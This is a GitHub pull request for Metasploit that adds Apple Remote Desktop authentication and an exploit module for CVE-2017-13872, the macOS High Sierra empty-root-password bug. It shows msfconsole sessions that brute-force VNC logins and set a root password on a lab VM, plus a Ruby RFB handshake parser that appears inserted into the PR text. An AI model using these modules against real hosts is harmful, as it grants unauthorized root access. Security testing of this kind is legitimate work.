
Implement ARD auth and add remote CVE-2017-13872 (iamroot) module #9302

Merged
merged 4 commits into from Dec 28, 2017

Conversation

@jgor (Contributor) commented Dec 14, 2017

This extends Rex::Proto::RFB to support usernames, implements authentication security type 30 ("Apple Remote Desktop" / ARD used by macOS), and uses that to add a module to remotely exploit CVE-2017-13872 over 5900/tcp on vulnerable macOS High Sierra hosts that have either Screen Sharing or Remote Management enabled.

Besides the added module for vulnerable High Sierra hosts, this lets scanner/vnc/vnc_login test credentials for any OSX host that has Screen Sharing or Remote Management enabled, and lays the groundwork for someone to add an OSX target to exploit/multi/vnc/vnc_keyboard_exec.

Verification

Note: 172.16.143.129 is a macOS High Sierra 10.13.1 vm, clean install, with System Preferences > Sharing > Screen Sharing enabled. Legitimate login is user:password.

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set RHOSTS 172.16.143.129
RHOSTS => 172.16.143.129
msf auxiliary(scanner/vnc/vnc_login) > set USERNAME user
USERNAME => user
msf auxiliary(scanner/vnc/vnc_login) > run

[*] 172.16.143.129:5900   - 172.16.143.129:5900 - Starting VNC login sweep
[+] 172.16.143.129:5900   - 172.16.143.129:5900 - Login Successful: user:password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/vnc/vnc_login) > creds
Credentials
===========

host            origin          service         public  private   realm  private_type
----            ------          -------         ------  -------   -----  ------------
172.16.143.129  172.16.143.129  5900/tcp (vnc)  user    password         Password
msf > use auxiliary/scanner/vnc/ard_root_pw
msf auxiliary(scanner/vnc/ard_root_pw) > set RHOSTS 172.16.143.129
RHOSTS => 172.16.143.129
msf auxiliary(scanner/vnc/ard_root_pw) > run

[*] 172.16.143.129:5900   - Attempting authentication as root.
[*] 172.16.143.129:5900   - Testing login as root with chosen password.
[+] 172.16.143.129:5900   - Login succeeded - root:xaavMPozB2HmDhGX
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/vnc/ard_root_pw) > creds
Credentials
===========

host            origin          service         public  private           realm  private_type
----            ------          -------         ------  -------           -----  ------------
172.16.143.129  172.16.143.129  5900/tcp (vnc)  root    xaavMPozB2HmDhGX         Password
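The PR above adds security type 30 (ARD) handling to Rex::Proto::RFB. From the defensive side, the same protocol detail is what an inventory check needs: a macOS host with Screen Sharing or Remote Management enabled advertises type 30 in the RFB security handshake on 5900/tcp. The Ruby below is an added example, not code from this PR or from Rex::Proto::RFB. It parses the ProtocolVersion banner and the server's security-type message (including the "count 0 + reason" refusal form) and flags hosts that offer ARD auth. The sample handshakes are constructed, not captured; the "RFB 003.889" banner is the version string Apple's screensharingd announces, which still uses the 3.7+ list-form handshake.

```ruby
require 'stringio'

# RFB security types from RFC 6143 / the IANA registry; 30 is Apple's ARD auth.
SECURITY_TYPE_NAMES = {
  0  => 'Invalid',
  1  => 'None',
  2  => 'VNC Authentication',
  16 => 'Tight',
  18 => 'TLS',
  19 => 'VeNCrypt',
  30 => 'Apple Remote Desktop (ARD)'
}.freeze

ARD_SECURITY_TYPE = 30

# Parse the 12-byte ProtocolVersion banner, e.g. "RFB 003.008\n".
# Apple's screensharingd announces "RFB 003.889\n"; it still uses the
# 3.7+ list-form security handshake, so only minor < 7 is rejected here.
def parse_version(io)
  banner = io.read(12)
  raise 'short ProtocolVersion banner' unless banner && banner.bytesize == 12
  m = banner.match(/\ARFB (\d{3})\.(\d{3})\n\z/)
  raise "not an RFB banner: #{banner.inspect}" unless m
  major = m[1].to_i
  minor = m[2].to_i
  if major != 3 || minor < 7
    raise "unsupported RFB version #{major}.#{minor} (list-form handshake needs 3.7+)"
  end
  [major, minor]
end

# Parse the server's security-type message: a U8 count followed by that many
# U8 types, or count 0 followed by a U32 length and a failure reason string.
def parse_security_types(io)
  count_byte = io.read(1)
  raise 'short security-type count' unless count_byte
  count = count_byte.unpack1('C')
  if count.zero?
    len_bytes = io.read(4)
    raise 'short reason length' unless len_bytes && len_bytes.bytesize == 4
    len = len_bytes.unpack1('N')
    reason = io.read(len)
    raise 'short reason string' unless reason && reason.bytesize == len
    return { failed: true, reason: reason, types: [] }
  end
  list = io.read(count)
  raise 'short security-type list' unless list && list.bytesize == count
  { failed: false, reason: nil, types: list.unpack('C*') }
end

# Classify one captured handshake: does this host advertise ARD auth?
def analyze_handshake(bytes)
  io = StringIO.new(bytes.b)
  version = parse_version(io)
  sec = parse_security_types(io)
  names = sec[:types].map { |t| SECURITY_TYPE_NAMES.fetch(t, "Unknown(#{t})") }
  {
    version: version,
    failed: sec[:failed],
    reason: sec[:reason],
    types: sec[:types],
    names: names,
    ard_exposed: sec[:types].include?(ARD_SECURITY_TYPE)
  }
end

# Constructed sample handshakes (not captured from a real host).
SAMPLE_APPLE    = ("RFB 003.889\n" + "\x02\x1e\x02").b   # 2 types: 30 (ARD), 2 (VNC auth)
SAMPLE_STANDARD = ("RFB 003.008\n" + "\x01\x02").b       # 1 type: 2 (VNC auth)
REFUSAL_REASON  = 'Too many security failures'
SAMPLE_REFUSED  = ("RFB 003.008\n" + "\x00" +
                   [REFUSAL_REASON.bytesize].pack('N') + REFUSAL_REASON).b

if __FILE__ == $PROGRAM_NAME
  { 'apple' => SAMPLE_APPLE, 'standard' => SAMPLE_STANDARD,
    'refused' => SAMPLE_REFUSED }.each do |label, hs|
    r = analyze_handshake(hs)
    status = r[:failed] ? "refused: #{r[:reason]}" : r[:names].join(', ')
    flag = r[:ard_exposed] ? ' [ARD exposed]' : ''
    puts "#{label}: RFB #{r[:version].join('.')} -> #{status}#{flag}"
  end
end
```

Feed `analyze_handshake` the first bytes a 5900/tcp listener sends after the client echoes the version banner; a result with `ard_exposed: true` is a macOS host whose Screen Sharing or Remote Management is reachable and therefore in scope for the patch status check this PR's module tests.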

@jgor (Contributor, Author) commented Dec 18, 2017

Apologies for the previous rspec failures, this is my first experience with it. It looks correct now but let me know if I'm misunderstanding something.
Fun fact, apparently the tests behave differently between macOS and Ubuntu so I had to switch to the latter just to replicate the error Travis CI was getting. >.<

@busterb (Contributor) commented Dec 18, 2017

Thanks @jgor this looks good! The order of requires and other behaviors are often controlled by things like the order in which files are found in the filesystem, which can be OS-dependent. The system IIRC also tries to randomly order tests, which can also lead to some indeterminism.

@busterb busterb self-assigned this Dec 28, 2017
@busterb (Contributor) commented Dec 28, 2017

msf auxiliary(scanner/vnc/vnc_login) > run

[*] 127.0.0.1:5900        - 127.0.0.1:5900 - Starting VNC login sweep
[-] 127.0.0.1:5900        - 127.0.0.1:5900 - LOGIN FAILED: bcook:password (Incorrect: Authentication failed: Unknown error)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/vnc/vnc_login) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(scanner/vnc/vnc_login) > run

[*] 127.0.0.1:5900        - 127.0.0.1:5900 - Starting VNC login sweep
[+] 127.0.0.1:5900        - 127.0.0.1:5900 - Login Successful: bcook:password1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@busterb (Contributor) commented Dec 28, 2017

Looks good with test VMs

msf auxiliary(scanner/vnc/ard_root_pw) > run

[*] 127.0.0.1:5900        - Attempting authentication as root.
[*] 127.0.0.1:5900        - Testing login as root with chosen password.
[*] 127.0.0.1:5900        - Testing login as root with empty password.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@busterb busterb merged commit 09772cb into rapid7:master Dec 28, 2017
busterb added a commit that referenced this pull request Dec 28, 2017
@busterb (Contributor) commented Dec 28, 2017

Great work @jgor! I'm going to writeup some docs for these based on notes from testing and push them in next.

@busterb (Contributor) commented Dec 28, 2017

Release Notes

This extends Rex::Proto::RFB to support usernames, implements authentication security type 30 ("Apple Remote Desktop" / ARD used by macOS), and uses that to add a module to remotely exploit CVE-2017-13872 over 5900/tcp on vulnerable macOS High Sierra hosts that have either Screen Sharing or Remote Management enabled.

Besides the added module for vulnerable High Sierra hosts, this also lets scanner/vnc/vnc_login test credentials for any OSX host that has Screen Sharing or Remote Management enabled, and lays the groundwork for someone to add an OSX target to exploit/multi/vnc/vnc_keyboard_exec.

@busterb (Contributor) commented Dec 28, 2017

5e71be7 for module docs
